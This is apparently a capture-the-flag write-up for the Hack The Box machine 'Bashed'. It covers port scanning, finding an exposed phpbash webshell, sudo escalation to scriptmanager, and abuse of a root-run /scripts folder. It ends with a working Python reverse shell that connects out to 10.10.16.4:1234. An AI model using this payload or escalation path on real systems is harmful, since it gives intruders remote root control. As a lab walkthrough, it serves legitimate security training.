Bashed

IP 10.10.10.68 NMAP

└─$ nmap -sV -sC -p- 10.10.10.68  
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Browser Gives a website that links to phpbash.php at github. It's a hint that it is deployed on the server.

Run dirbuster and fuzz for directories and the file phpbash.php. Use the /{}/phpbash.php as query. The only result with response 200 is at http://10.10.10.68/dev/phpbash.php.

Go to the webpage and we get a webshell. We are user www-data and can read the user.txt at /home/arrexel.

If we upload a reverse shell (php) in the html-web-folder we can get a reverse shell, and then run sudo -u scriptmanager bash in order to get a responsive shell as scriptmanager.

We type sudo -l and see that we can run any command as scriptmanager. At the /-folder there is a folder called scripts that is owned by scriptmanager. We can't cd in to it, but we can read the content with sudo -u scriptmanager ls -la /scripts/ (without the " " incapsulating the command).

The content is:

drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Oct 11 12:27 test.txt

If we upload a python reverse shell-script we can get reverse shell as root.

import socket, subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);